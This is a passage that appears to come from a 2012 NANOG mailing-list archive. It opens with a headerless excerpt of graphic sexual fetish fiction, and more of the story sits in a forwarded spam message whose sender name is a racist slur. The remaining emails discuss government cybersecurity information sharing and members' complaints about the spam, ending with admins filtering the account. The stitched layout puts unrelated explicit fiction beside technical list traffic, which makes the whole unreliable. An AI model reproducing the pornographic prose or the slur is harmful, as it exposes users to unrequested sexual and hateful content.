smile on her full lips. He unconsciously resumed stroking his own shaft and was rewarded with the novel but invigorating sensation of four hands on his dick.?Um, I thought that we weren?t supposed to have sex until Jen got back. Not that I mind??. Kimber shook her head and giggled. ?We?re not having sex, silly. You?re just masturbating. I?m just helping you.? She pushed his cock head back towards his face. ?Shouldn?t you be sucking right now?? Chris had already leaned way back, opened his mouth, and extended his tongue when a thought occurred to him. He leaned away from his mammoth, reddish head, and gave Kimber a pleading look. ?Wouldn?t you rather do it?? ?Nuh-uh!? Kimber pushed his cock head back towards his mouth. ?That?s oral sex. We both promised Jen no sex without her.? She continued to stroke her hands up and down his fleshy pole. ?Masturbation is okay. It?s healthy for you to masturbate. You can masturbate all you want. I?m glad you like to masturbate so much.? Kimber blushed. ?I like to masturbate a lot, too, but not nearly as much as you do.? ?Uh, can we call it ?jerking off?? ?Masturbation? sounds a little clinical.? Chris asked. Kimber smiled eagerly. ?Of course, Chris. You sure like to jerk off a lot. Your big cock must feel really good when you jerk off, doesn?t it?? Chris nodded. ?Now be quiet and suck your big dick like a good boy. You can?t get any cum on the towels, so you?ll have to suck it all up. Okay?? Chris had already planted his mouth on his cock head and was slurping for all he was worth, so he only nodded. ?That?s a good boy, Chris!? Kimber started pumping his prick more energetically. ?You just keep jerking off until you are good and satisfied, and I?ll help so your arms don?t get tired. We?ll get this big dick to relax in no time.? Chris, remarkably unselfconscious for once, hungrily licked and slurped his own dick, reveling in the sensation of additional hands on his massive, lengthy pole. This is what I need? some help getting some satisfaction! Maybe Tasha can come in and help out too. Just as he was about to call out to Kimber?s roommate for more assistance, Kimber reached up and gently guided his mouth over his huge cock slit. ?Now, come on, Chris. No fooling around. You?ve gotta eat all this yummy cum. Don?t you want to eat it all up?? Chris dutifully started sucking eagerly. I wonder if Greg would want to help out? I bet you he couldn?t resist the chance. Terry would probably help out too. Chris envisioned Jen and both of her roomates, as well as Persephone, Greg, and Terry, all stroking his dick. If I could just get about six people to jerk me off, I could relax and really focus on sucking my cock. I wonder if there?s enough room for six? Chris?s musing was interrupted by the start of another massive, delicious orgasm. Mmmmmm! Given Kimber?s enthusiastic coaching and encouragement, Chris felt like he could have gone all night. Kimber cooed and praised him while the two of them massaged his enormous schlong, and oohed and ahhed as he gulped down huge quantities of spunk each time. Kimber not only was eagerly massaging his hot, throbbing cock, but she seemed excited and amused to watch him cum again and again. She really likes this! I wonder if it would be a turn on for Jen, too? Chris was more than willing to keep going, but after five massive ejaculations with Kimber?s help, there was an impatient banging on the door that startled him.? ?What?s going on in there? Are we ready to go yet? It?s been almost an hour! Come on!?, shouted Tasha. ?I?m working so Chris can fit into his pants!? shouted Kimber back, winking at Chris and not missing a stroke on his thick sausage. She stuck her tongue out at the general direction of Tasha. ?I thought you already sewed them up??, demanded Tasha. ?They have to fit! We?ll be done soon! Gimme a minute!? Kimber yelled. She continued, more quietly to Chris. ?You take as long as you need, Chris. It?s healthy to mas? jerk off. You?re lucky that your cum is so tasty, and you can eat as much of it as you want. If I swallowed this much, I?d be getting fat!? She paused, then leaned forward and planted a kiss on his cheek. She whispered, ?I like helping you jerk off. It?s fun. Your face looks so funny when you cum. Your cheeks puff out like a chipmunk. I like jerking you off. I?ll be glad to help you jerk off whenever you want, Chris.? That was enough to bring Chris to another volcanic eruption of cum. He gulped the entire quart of spunk down hungrily, but was disappointed to feel his incredible hard-on subsiding. Aww, really? Darn that Tasha for interrupting the moment. I just needed a few more to be satisfied for a little bit. As he felt his cock finally start to soften from thirty inches towards a slightly more manageable nineteen inches, Chris started to sit up. ?I think I?m about ready, Kimber. Let?s see if we can go get you and Tasha some big boobs.? As he sat up, he became aware of the sloshing of a gallon or more of semen in his hugely swollen belly. His tummy bulged out comically from his slim torso, and he could feel the heavy weight of five pounds of cum swaying around in it.? ?Oh, look at your big belly!? Kimber giggled and patted his round stomach. ?It?s so full of yummy cum. Look at all the cum you ate, Chris!? She bent over and whispered to his swollen stomach. ?Hurry up, tummy, and pump all that cum back in Chris?s balls, so they?ll be big and fat again, and he can suck up some more.? She straightened up and looked quizzically at Chris. ?You do like your balls to be really big and full, don?t you??? Chris blushed. ?I guess I do, Kimber. It just feels better being all the way full, I think. I know it?s probably not sensible, but??. ?That?s okay, Chris. I like you really big, too. So do Jen and Tasha. We all like our little Chris with his big, huge dick and his big fat balls. You wouldn?t be nearly as cute without your great big huge cock and balls.? She smiled at him, then planted a quick peck on his cheek. ?Now get your clothes on, silly.? Though Chris?s nuts were not swollen to their fullest girth, it was still a struggle getting into the spandex and his baggy black pants. His belly was so bloated with his own cum that he couldn?t pull the stretch pants up over it. Even the baggy black pants were tight around his stuffed belly. His shirt wouldn?t stretch all the way over his belly either, exposing a slight gap of cum-stuffed tummy. Chris walked out of the bathroom waddling not only from his massive dick and balls, but also from his bulging gut. Tasha noticed immediately. ?Hey, have you been guzzling your own cum again?? She narrowed her eyes and waggled a finger at Chris. Chris patted his full belly and tried to look innocent. ?Does it show?? Tasha strode up to him, looming over the shorter boy. She came in close, her slim pelvis pushing against Chris?s protruding stomach. Her long hair flowed around her face as she looked down at him. ?Damn it, Chris. I want to watch when you are sucking yourself off. I want to get it on camera. I don?t care how much you do it. You can suck yourself off all night, so long as I get to film it. What does a girl have to do around here to check out you slurping on that gigantic rod?? Chris looked up at her and quickly wrapped his arms around her slender waist, squeezing his taut belly against her. Standing so close to Tasha, he could smell her perfume, and he felt himself start to stiffen just a little as he squeezed her against his body. ?Maybe a girl?s got to be willing to help out a little.? Chris looked meaningfully at Kimber, who blushed, and then back at Tasha.? Tasha looked incredulously at Kimber. ?I knew it! Helping him with his pants! You should be ashamed of yourself, you slutty little seamstress!? ?Hey, I said I was helping him fit in his pants. His thing was way too big to fit in these pants when it was hard, so I helped! He fits now.? Kimber stormed past Tasha. ?Let?s go get this boob cream.? Tasha poked Chris in his bulging gut. ?Barely fits, you mean. I?m not sure if the cum is going from your balls to your belly, or to your brain. I think you might be getting addicted to your own dick.? Chris patted his own belly protectively. ?Hey, you said it tasted good yourself! You can?t blame a guy for trying it.s? He began to waddle after Kimber. ?It tastes amazing, but I didn?t spend two hours gorging myself on it either. I like pizza but I don?t eat the whole pie,? grumbled Tasha. ?You would if you couldn?t get fat!? sang Kimber, teasingly.? The three piled into Tasha?s old beater and made their way to campus. Chris, thankfully, was able to sit in the front seat, and didn?t have to try to crush his massive package into the back seat. However, it was such a short drive that his stomach was still bulging from his self-serve buffet. He struggled out of the car as Tasha pulled up to Tupelo East. ?I?ll get the cream and be right back. Just stay here,? he admonished the girls. He waddled up the sidewalk and up the stairs, his bloated belly sloshing with sperm. Damn, when I do that again, I?d better leave some time to digest. I wonder if anyone else can hear the jizz gurgling in my gut. I?m soooo full. Once Chris had lugged his huge package, and his full belly, up the stairs to the second floor, he was dismayed to see Kevin, the tall blonde guy from the lacrosse team, hustling down the hall. Kevin was obviously headed somewhere in a hurry, but he stopped and looked Chris up and down, a malicious gleam in his eye. ?Whew! You sure are packing on the pounds there, Chow Yun Fatso!? He stepped up to Chris and patted his round gut, which protruded from his shirt. ?What are you majoring in? Eating?? He patted Chris?s stomach a bit harder. ?I thought you were wearing baggy pants because you were a Goth. I didn?t realize you were planning on growing into them, porker.? Chris started to retort, but Kevin threw up his hands in mock horror. ?I better shut up, or Fatty will eat me! See you around, piggy!? Kevin dodged around Chris and barreled down the stairs, obviously headed somewhere in a hurry. Chris felt his face get hot with embarrassment. That stupid Kevin! I should show him! He thinks I?m fat! I?m not fat, I?m just refilling my balls. I oughta stuff my cock down his throat and fill him full of cum. He?d be fat in no time. I?d pump him so full of cum that he wouldn?t be able to fit in the hallway. Stupid jerk. Chris could feel his dick begin to tingle at the thought of cumming over and over again, filling someone up with gallons of jizz. Him and that asshat James. They both need a few gallons of cum dumped in them. They wouldn?t be able to smart off with their mouth full of my big, thick cock. Chris entered the room he shared with Greg and Terry. He noticed their exercise clothes scattered all over the floor, but he was focused on his goal. He opened Terry?s closet and extracted a single full jar of the growth cream. Look at all that cream! The girls could get huge. Jen could get big enough for me to tit-fuck. She could get so big that I?d need?Just think how big I could get with all this cream! Maybe a little more?No! He shut the closet door firmly and rummaged through the remains of his mom?s care package, selecting a couple snack cakes and quickly unwrapping them. Man, I can?t wait till Jen gets home with pizza. My balls really need filled back up. I?m nowhere near full down there, he noted, patting his round, full tummy as he stuffed the snack cakes in his mouth. Plenty full up here, but not quite full down there. Gotta get all the way full. Chris hurriedly unwrapped a few more snack cakes and shoveled them one after another into his mouth. Chris waddled back out of the room, locking the door behind him, and licking crumbs off his fingers as he made his way awkwardly down the stairs. It?s just so much work keeping my cock and nuts in shape, but it?s worth it. From valdis.kletnieks at vt.edu Tue Jul 10 10:54:59 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Tue, 10 Jul 2012 11:54:59 -0400 Subject: U.S. spy agencies ... email for cybersecurity In-Reply-To: Your message of "Tue, 10 Jul 2012 21:19:07 +0530." References: <4FFB898B.2000908@gmail.com> <3850.1341932602@turing-police.cc.vt.edu> <4FFC496B.7070004@ip-solutions.net> Message-ID: <26599.1341935699@turing-police.cc.vt.edu> On Tue, 10 Jul 2012 21:19:07 +0530, Suresh Ramasubramanian said: > On Tue, Jul 10, 2012 at 8:55 PM, Harry Hoffman > wrote: > > The government is already doing this via the ISACs. > > > > http://www.ren-isac.net/docs/charter.html > > I have a lot of respect for what REN-ISAC does but it doesn't nearly > have the sort of coverage this project appears to be looking at. The important point is that it's hardly a new and revolutionary idea... -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From ops.lists at gmail.com Tue Jul 10 10:58:53 2012 From: ops.lists at gmail.com (Suresh Ramasubramanian) Date: Tue, 10 Jul 2012 21:28:53 +0530 Subject: U.S. spy agencies ... email for cybersecurity In-Reply-To: <26599.1341935699@turing-police.cc.vt.edu> References: <4FFB898B.2000908@gmail.com> <3850.1341932602@turing-police.cc.vt.edu> <4FFC496B.7070004@ip-solutions.net> <26599.1341935699@turing-police.cc.vt.edu> Message-ID: On Tue, Jul 10, 2012 at 9:24 PM, wrote: > >> I have a lot of respect for what REN-ISAC does but it doesn't nearly >> have the sort of coverage this project appears to be looking at. > > The important point is that it's hardly a new and revolutionary idea... Sure. Is there any point in reinventing a wheel? Multiple different silo'd communities have ever been useful - and also the biggest stumbling block for coordination. Clearinghouses at a national level aren't particularly new either - the aussie telecom regulator ACMA set one up for spam / security reports with various local service providers and its been doing just fine for the past few years. At a basic level, aggregating + anonymizing feeds from various data sources and sending alerts to SPs.. and cooperation only builds upwards from there. -- Suresh Ramasubramanian (ops.lists at gmail.com) From ag4ve.us at gmail.com Tue Jul 10 11:05:36 2012 From: ag4ve.us at gmail.com (shawn wilson) Date: Tue, 10 Jul 2012 12:05:36 -0400 Subject: *spam* Fwd: U.S. spy agencies ... email for cybersecurity Message-ID: can some op filter this asshole? ---------- Forwarded message ---------- From: NIG NOG Date: Tue, Jul 10, 2012 at 11:44 AM Subject: Re: U.S. spy agencies ... email for cybersecurity To: Suresh Ramasubramanian , "valdis.kletnieks at vt.edu" Cc: North American Network Operators Group ?Come on! It?s time to play with the Wii!? Kimber dragged Chris to the middle balance board. ?Let?s do snowboarding first. That?s fun.? She let everyone get in position, and started the snowboarding game. At first, Chris felt a little clumsy. His massive, stuffed balls weighed heavily on his legs, and his thick, semi-erect dick, straining against his pants, made it feel like they were going to pull down at any moment. As Tasha and Kimber snickered at his poor performance, Chris felt himself getting annoyed. I?ve never done this with a monster cock between my legs! It?s throwing me off balance! Chris sighed audibly and settled his feet as far apart as possible on the balance board. His mammoth nutsack swung heavily between his legs. It pulled the stretchy pants even lower on his body, exposing the base of his broad prick. Chris felt a bit self-conscious about that, but it felt so good to let his gargantuan ballsack brush against the fabric of his pants and against the sides of his thighs. He soon noticed another benefit. With both his colossal rod and his fat nuts between his legs, his center of gravity had shifted downward considerably. Once he relaxed and allowed his gargantuan manhood to sway freely, its huge weight counteracted his upper body motions, acting like some genital gyroscope. In no time, Chris was ?snowboarding? much better than he had ever done before, surpassing both Tasha and Kimber. As an added bonus, the swaying, sliding sensation felt fantastic. ?Wow, Chris! You?re really coming from behind!? cheered Kimber, who, facing in the same direction as Chris, and positioned in front of him in the row, did not see his technique. ?I?m about to cum just from the view from behind,? drooled Tasha, ogling Chris?s butt and the mammoth, swinging bulge between his legs. ?I think he?s a natural.? After a few minutes more of snowboarding, Kimber announced, ?Okay, that was a good warm up. Let?s get our hearts pumping.? She stopped the game and stepped off her board, then bent down and turned it parallel to the tv. Tasha followed suit and Chris complied clumsily, finding it difficult to bend over with a semi-hard boner between him and the board. Once the boards were positioned, Kimber launched a step aerobics routine, and Chris groaned immediately. The huge girth of his balls forced his thighs apart into a bowlegged stance, and the heft of his twenty pound nutsack and thick, fat prick was a burden to swing up with each step. While each of the girls fairly bounced up and down the board, Chris was laboriously heaving himself up and down, feeling like he had a thirty pound sack of potatoes between his legs. Ugh. Whew! I?m not sure how long I can do this. After a few quick, clumsy steps up and down, Chris stepped back off the board. ?I?m not sure I?m quite built for this one, Kimber,? he said apologetically. ?Oh, Chris? she said while bouncing up and down the step, ?that?s okay. Sit this one out. You can jump back in whenever you want.? Chris waddled around the coffee table and sat down on the couch, spreading his legs wide to give his bloated balls plenty of room. He sighed with relief as the cushions absorbed the weight of his oversized genitals. Chris adjusted himself with both hands and settled down to watch the two girls bounce up and down on the step. This is the kind of workout I can handle! Just get Jen in there too, and my heart rate will be plenty high. Tasha and Kimber continued their step routine for several more minutes, until Tasha gasped, ?That?s it! I?m picking the next one,? and stepped off the board with slightly wobbly legs. She gave a quick glance back at Chris on the couch, his fat, semi-hard salami bulging visibly through his stretchy pants. ?I think this one is more our speed.? She launched a hula hoop routine, and Chris was transfixed as both girls began gyrating their hips and butts. ?Ooooh! This one is fun!? squealed Kimber. Fun? This one is freaking amazing!, thought Chris. He could feel his cock immediately start to swell and thicken again. Kimber?s firm bubble butt looked incredible in the tight pink shorts she had on, and it bounced tantalizingly as she swiveled around. Tasha?s posterior wasn?t quite as curvy, though it was still nice, but her silky, high-cut shorts gave Chris a better view of her creamy white hips. Nnnnngh! Gotta get some of that. Chris?s thick prick began to creep even farther down the leg of his pants, easily surpassing the twenty six inch point. His girth continued to swell, stretching the leg of the pants entirely out of proportion. I?ll just slip out of these and I can have Kimber and Tasha right here on the couch. I wonder if I should do Kimber first, or Tasha? I bet Tasha will want to watch me with Kimber. Ohhh, but maybe Kimber will let me kiss her boobs while Tasha swallows first. I wonder if either of them has enough room for a second helping? Suddenly, Chris realized what he was doing. His mammoth schlong had almost reached his ankle in the sweats, and was easily over a foot around. It looked like he had two legs in one leg of the pants. His massive dick was throbbing urgently, and continued to surge and grow. I told Jen that I would control myself until she got back, and I?m already working out seconds with these two. I can?t do that! Jen would freak out! He stroked the side of his ballooning cock wistfully. What am I gonna do? I can?t resist this for six more hours. I gotta get off! He stroked his huge anaconda with both hands, a bit more vigorously. I gotta satisfy my cock. It has to get off soon! Chris?s eyes went back to the two mouthwatering asses shimmying in front of him. Oh, god. I need them soooooo bad. Jen would kill me, but I need some sex sooooon! -- Shawn Wilson 703-517-1201 From jhellenthal at dataix.net Tue Jul 10 11:10:29 2012 From: jhellenthal at dataix.net (Jason Hellenthal) Date: Tue, 10 Jul 2012 12:10:29 -0400 Subject: HELP IN SETTING UP iBGPlay In-Reply-To: <1341935135.48155.YahooMailNeo@web142504.mail.bf1.yahoo.com> References: <248cb92a-124d-4f7a-8d2f-f8bfc5e9d9b9@MX-IX-NBO> <1341935135.48155.YahooMailNeo@web142504.mail.bf1.yahoo.com> Message-ID: <20120710161029.GA29940@DataIX.net> Anyone going to block this fool ? On Tue, Jul 10, 2012 at 08:45:35AM -0700, NIG NOG wrote: -- - (2^(N-1)) From boards188 at gmail.com Tue Jul 10 11:11:59 2012 From: boards188 at gmail.com (Jason Pope) Date: Tue, 10 Jul 2012 11:11:59 -0500 Subject: U.S. spy agencies ... email for cybersecurity Message-ID: Seriously, on the subject of "email for cybersecurity", can we please just black list NIG NOG ? Jason K Pope From john-nanog at johnpeach.com Tue Jul 10 11:16:41 2012 From: john-nanog at johnpeach.com (John Peach) Date: Tue, 10 Jul 2012 12:16:41 -0400 Subject: *spam* Fwd: U.S. spy agencies ... email for cybersecurity In-Reply-To: References: Message-ID: <20120710121641.31ab750b@godzilla.peachfamily.net> On Tue, 10 Jul 2012 12:05:36 -0400 shawn wilson wrote: > can some op filter this asshole? > Please stop forwarding the whole message; I'd already dropped him in my procmail rules. -- john From sethm at rollernet.us Tue Jul 10 11:25:29 2012 From: sethm at rollernet.us (Seth Mattinen) Date: Tue, 10 Jul 2012 09:25:29 -0700 Subject: Admin? Bueller? In-Reply-To: <20120710121641.31ab750b@godzilla.peachfamily.net> References: <20120710121641.31ab750b@godzilla.peachfamily.net> Message-ID: <4FFC5779.3030105@rollernet.us> On 7/10/12 9:16 AM, John Peach wrote: > On Tue, 10 Jul 2012 12:05:36 -0400 > shawn wilson wrote: > >> can some op filter this asshole? >> > > Please stop forwarding the whole message; I'd already dropped him in my > procmail rules. > I don't think the archives need to be archiving it, and those with corporate accounts on here may not appreciate explaining it to HR. Whatever admin that's asleep at the wheel needs to wake up. ~Seth From ag4ve.us at gmail.com Tue Jul 10 11:23:47 2012 From: ag4ve.us at gmail.com (shawn wilson) Date: Tue, 10 Jul 2012 12:23:47 -0400 Subject: *spam* Fwd: U.S. spy agencies ... email for cybersecurity In-Reply-To: <20120710121641.31ab750b@godzilla.peachfamily.net> References: <20120710121641.31ab750b@godzilla.peachfamily.net> Message-ID: On Tue, Jul 10, 2012 at 12:16 PM, John Peach wrote: > On Tue, 10 Jul 2012 12:05:36 -0400 > shawn wilson wrote: > >> can some op filter this asshole? >> > > Please stop forwarding the whole message; I'd already dropped him in my > procmail rules. > *shrug*, it needed a new thread since it ot of the originating thread. i feel that a maintained list should actively filter spam instead of expect users to setup their own filters. it's better for the list archives as well. From shrdlu at deaddrop.org Tue Jul 10 11:35:54 2012 From: shrdlu at deaddrop.org (Lynda) Date: Tue, 10 Jul 2012 09:35:54 -0700 Subject: Admin? Bueller? In-Reply-To: <4FFC5779.3030105@rollernet.us> References: <20120710121641.31ab750b@godzilla.peachfamily.net> <4FFC5779.3030105@rollernet.us> Message-ID: <4FFC59EA.4050301@deaddrop.org> On 7/10/2012 9:25 AM, Seth Mattinen wrote: > On 7/10/12 9:16 AM, John Peach wrote: >> On Tue, 10 Jul 2012 12:05:36 -0400 >> shawn wilson wrote: >>> can some op filter... >> Please stop forwarding the whole message; I'd already dropped him in my >> procmail rules. +1 > I don't think the archives need to be archiving it, and those with > corporate accounts on here may not appreciate explaining it to HR. > Whatever admin that's asleep at the wheel needs to wake up. I just BCC'd someone, in case they aren't currently paying attention to the list. Seriously, though, this account should have been blocked after the very first message. There's enough traffic on the list without adding this (and all the resulting followups) to it, thanks. -- Politicians are like a Slinky. They're really not good for anything, but they still bring a smile to your face when you push them down a flight of stairs. From jlewis at lewis.org Tue Jul 10 11:37:33 2012 From: jlewis at lewis.org (Jon Lewis) Date: Tue, 10 Jul 2012 12:37:33 -0400 (EDT) Subject: Admin? Bueller? In-Reply-To: <4FFC5779.3030105@rollernet.us> References: <20120710121641.31ab750b@godzilla.peachfamily.net> <4FFC5779.3030105@rollernet.us> Message-ID: On Tue, 10 Jul 2012, Seth Mattinen wrote: > On 7/10/12 9:16 AM, John Peach wrote: >> On Tue, 10 Jul 2012 12:05:36 -0400 >> shawn wilson wrote: >> >>> can some op filter this asshole? >>> >> >> Please stop forwarding the whole message; I'd already dropped him in my >> procmail rules. >> > > I don't think the archives need to be archiving it, and those with > corporate accounts on here may not appreciate explaining it to HR. > Whatever admin that's asleep at the wheel needs to wake up. Yahoo? Don't hold your breath. The person appears to have been using the same yahoo account for all the nig nog messages. Why whoever has admin rights to the mailing list hasn't removed/banned/filtered nanog195 at yahoo.com is a mystery. ---------------------------------------------------------------------- Jon Lewis, MCP :) | I route Senior Network Engineer | therefore you are Atlantic Net | _________ http://www.lewis.org/~jlewis/pgp for PGP public key_________ From jgreco at ns.sol.net Tue Jul 10 10:35:49 2012 From: jgreco at ns.sol.net (Joe Greco) Date: Tue, 10 Jul 2012 10:35:49 -0500 (CDT) Subject: Admin? Bueller? In-Reply-To: Message-ID: <201207101535.q6AFZnId074172@aurora.sol.net> > On Tue, 10 Jul 2012, Seth Mattinen wrote: > > On 7/10/12 9:16 AM, John Peach wrote: > >> On Tue, 10 Jul 2012 12:05:36 -0400 > >> shawn wilson wrote: > >> > >>> can some op filter this asshole? > >>> > >> > >> Please stop forwarding the whole message; I'd already dropped him in my > >> procmail rules. > >> > > > > I don't think the archives need to be archiving it, and those with > > corporate accounts on here may not appreciate explaining it to HR. > > Whatever admin that's asleep at the wheel needs to wake up. > > Yahoo? Don't hold your breath. The person appears to have been using the > same yahoo account for all the nig nog messages. Why whoever has admin > rights to the mailing list hasn't removed/banned/filtered > nanog195 at yahoo.com is a mystery. It's the union of mailing list on autopilot with service provider on autopilot. ... JG -- Joe Greco - sol.net Network Services - Milwaukee, WI - http://www.sol.net "We call it the 'one bite at the apple' rule. Give me one chance [and] then I won't contact you again." - Direct Marketing Ass'n position on e-mail spam(CNN) With 24 million small businesses in the US alone, that's way too many apples. From grizz at dipd.com Tue Jul 10 11:41:23 2012 From: grizz at dipd.com (Matt Griswold) Date: Tue, 10 Jul 2012 11:41:23 -0500 Subject: Admin? Bueller? In-Reply-To: References: <20120710121641.31ab750b@godzilla.peachfamily.net> <4FFC5779.3030105@rollernet.us> Message-ID: <20120710114123.6265101e@segv> * Jon Lewis [120710 12:37 -0400]: > Yahoo? Don't hold your breath. The person appears to have been > using the same yahoo account for all the nig nog messages. Why > whoever has admin rights to the mailing list hasn't > removed/banned/filtered nanog195 at yahoo.com is a mystery. We were letting people practice their procmail :) They've both been filtered. From kurt at idb-sys.com Tue Jul 10 11:48:04 2012 From: kurt at idb-sys.com (Kurt Ellzey) Date: Tue, 10 Jul 2012 12:48:04 -0400 Subject: Admin? Bueller? In-Reply-To: <20120710114123.6265101e@segv> References: <20120710121641.31ab750b@godzilla.peachfamily.net> <4FFC5779.3030105@rollernet.us> <20120710114123.6265101e@segv> Message-ID: <03aa01cd5ebb$c6a85bb0$53f91310$@idb-sys.com> >We were letting people practice their procmail :) They've both been filtered. It's situations like this that make me happy I signed up. I just started with the list this week, and finding out tools for correcting specific tasks is outstanding. Finding ones that actually WORK is a bonus. Thanks for the tip. From ryan.g at atwgpc.net Tue Jul 10 11:46:21 2012 From: ryan.g at atwgpc.net (Ryan Gelobter) Date: Tue, 10 Jul 2012 11:46:21 -0500 Subject: Hotmail/live In-Reply-To: References: Message-ID: I'd appreciate it if a postmaster from the Hotmail/Live team could contact me off-list as well. My previous contacts are no longer part of the Hotmail team and haven't been able to successfully get me in touch with anyone over there. On Wed, Jun 27, 2012 at 12:18 PM, matt kelly wrote: > Can a hotmail/live.com postmaster contact me offlist please? > > Thanks > From jcdill.lists at gmail.com Tue Jul 10 11:48:19 2012 From: jcdill.lists at gmail.com (JC Dill) Date: Tue, 10 Jul 2012 09:48:19 -0700 Subject: Admin? Bueller? In-Reply-To: <4FFC5779.3030105@rollernet.us> References: <20120710121641.31ab750b@godzilla.peachfamily.net> <4FFC5779.3030105@rollernet.us> Message-ID: <4FFC5CD3.1070609@gmail.com> On 10/07/12 9:25 AM, Seth Mattinen wrote: > Whatever admin that's asleep at the wheel needs to wake up. ~Seth I'm really surprised that people who subscribe to NANOG don't know any better than to send their complaints TO THE LIST ADDRESS instead of emailing the ADMIN address. Sheesh - it's worse than AOL around here these days. jc From valdis.kletnieks at vt.edu Tue Jul 10 11:48:08 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Tue, 10 Jul 2012 12:48:08 -0400 Subject: Admin? Bueller? In-Reply-To: Your message of "Tue, 10 Jul 2012 11:41:23 -0500." <20120710114123.6265101e@segv> References: <20120710121641.31ab750b@godzilla.peachfamily.net> <4FFC5779.3030105@rollernet.us> <20120710114123.6265101e@segv> Message-ID: <40490.1341938888@turing-police.cc.vt.edu> On Tue, 10 Jul 2012 11:41:23 -0500, Matt Griswold said: > We were letting people practice their procmail :) They've both been > filtered. "both"? I only noticed one source account? -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From dougb at dougbarton.us Tue Jul 10 11:55:29 2012 From: dougb at dougbarton.us (Doug Barton) Date: Tue, 10 Jul 2012 09:55:29 -0700 Subject: Admin? Bueller? In-Reply-To: <4FFC5CD3.1070609@gmail.com> References: <20120710121641.31ab750b@godzilla.peachfamily.net> <4FFC5779.3030105@rollernet.us> <4FFC5CD3.1070609@gmail.com> Message-ID: <4FFC5E81.5060101@dougbarton.us> On 7/10/2012 9:48 AM, JC Dill wrote: > On 10/07/12 9:25 AM, Seth Mattinen wrote: >> Whatever admin that's asleep at the wheel needs to wake up. ~Seth > > I'm really surprised that people who subscribe to NANOG don't know any > better than to send their complaints TO THE LIST ADDRESS instead of > emailing the ADMIN address. Sheesh - it's worse than AOL around here > these days. Me too! -- If you're never wrong, you're not trying hard enough From george.herbert at gmail.com Tue Jul 10 12:16:36 2012 From: george.herbert at gmail.com (George Herbert) Date: Tue, 10 Jul 2012 10:16:36 -0700 Subject: Admin? Bueller? In-Reply-To: <20120710114123.6265101e@segv> References: <20120710121641.31ab750b@godzilla.peachfamily.net> <4FFC5779.3030105@rollernet.us> <20120710114123.6265101e@segv> Message-ID: On Tue, Jul 10, 2012 at 9:41 AM, Matt Griswold wrote: > * Jon Lewis [120710 12:37 -0400]: >> Yahoo? Don't hold your breath. The person appears to have been >> using the same yahoo account for all the nig nog messages. Why >> whoever has admin rights to the mailing list hasn't >> removed/banned/filtered nanog195 at yahoo.com is a mystery. > > We were letting people practice their procmail :) They've both been > filtered. Scary thought - is there nobody from Yahoo on NANOG anymore? I mean, really, if you are at provider X and provider X starts spamming the list, I would think you'd deal with that internally... 8-( -- -george william herbert george.herbert at gmail.com From morrowc.lists at gmail.com Tue Jul 10 12:22:24 2012 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Tue, 10 Jul 2012 13:22:24 -0400 Subject: Admin? Bueller? In-Reply-To: References: <20120710121641.31ab750b@godzilla.peachfamily.net> <4FFC5779.3030105@rollernet.us> <20120710114123.6265101e@segv> Message-ID: On Tue, Jul 10, 2012 at 1:16 PM, George Herbert wrote: > I mean, really, if you are at provider X and provider X starts > spamming the list, I would think you'd deal with that internally... it's a tad rough to call what's happening 'spamming', it's surely 'sending off-topic mails to a list'. I'm not sure yahoo would classify (or most other folks) this as 'bad enough to ban the account' yet. the admins of the nanog-list could certainly take action though. From ag4ve.us at gmail.com Tue Jul 10 12:39:43 2012 From: ag4ve.us at gmail.com (shawn wilson) Date: Tue, 10 Jul 2012 13:39:43 -0400 Subject: Admin? Bueller? In-Reply-To: References: <20120710121641.31ab750b@godzilla.peachfamily.net> <4FFC5779.3030105@rollernet.us> <20120710114123.6265101e@segv> Message-ID: On Tue, Jul 10, 2012 at 1:22 PM, Christopher Morrow wrote: > the admins of the nanog-list could certainly take action though. > the reason for my email is that it was the second ot type email in a week and i was hoping someone could clarify what the moderators will and won't do. i don't think an isp should block an email of this type - it doesn't appear the account has been compromised at this point. the email is ot to the list, not a compromise to the sender or isp. From morrowc.lists at gmail.com Tue Jul 10 15:47:53 2012 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Tue, 10 Jul 2012 16:47:53 -0400 Subject: U.S. spy agencies ... email for cybersecurity In-Reply-To: References: <4FFB898B.2000908@gmail.com> Message-ID: On Mon, Jul 9, 2012 at 11:22 PM, Christopher Morrow wrote: > (note, people ought to: 1) think about this on their own making up > their own minds, 2) understand that the press has some very weird > ideas, 3) take some better protections on their own, for their own > security) > > also, I'm not judging the OP nor the reporter nor the ideas espoused > in the article/clips... > > On Mon, Jul 9, 2012 at 9:46 PM, William Allen Simpson > wrote: >> Somebody needs to give them a clue-by-four. The private sector > > people keep trying, sometimes it's helped. sometimes reporters need to > sell stories :( > >> already has the "Internet address where an email ... originated"; > > it's not just email they care about :( (you knew that I think) > >> it's already in the Received lines. We don't need to be informed >> about it, we already inform each other about it. > > one interesting idea, that has proven out some merit over the years is > the ability to share 'incident' data across entry points (say across > companies, or gov'ts even) about 'bad things' that are happening. > > Take the case of 'spam came in from this end system to my mailserver', > if I tell you that (or some central system that which you can query) > you'll learn that maybe the inbound connection to you is also > spam-rich. > >> And it's already delivered "at network speed." >> > > the article sort of reads like the above scenario though... maybe it's > NOT that, maybe it's something else entirely... it SEEMS that the > gov't wants to help. They may be able to, they may just foul things > up. The reporter certainly didn't leave enough details in place to > tell :( > >> It is my understanding the Dept of Homeland Security already >> cooperates in sharing government intrusion information. We certainly >> don't need a "U.S. spy agency" MITM to "protect the private sector." > > > > you may mean? could be... the wikipedias are sometimes wrong, or so > says the teacher of my 7yr old. > >> Moreover, the US is the source of most spam and malware, so the NSA >> isn't really going to be much help. And the US is the source of the > > but hosts in the US that are botted/spamming, also spam/bot other > things outside the US, right? so really who cares where the src is, > get some data collection points up and use that data to inform your > security policy, no? (sure, you'll have to have some smarts, and some > smart people, and be cautious... but you'd do that anyway, right? :) ) > > These folks have some awesome tech for that sort of data collection > and analysis: > > > it's a shame that their parent company can't find a way to monetize > that sort of thing. (the article there talks about some older version > of the system, which is still alive/well today doing fraud detection > and was doing some IDS/anomaly-detection-like work as well for ip > network things) to be fair to vz/mci here, an offline reader pointed me to: hey lookie, they sold one :) (hopefully for the sheriff folks, they can do more of this, it really is cool) >> only known cyber attacks on other country's infrastructure, so it's >> not likely much 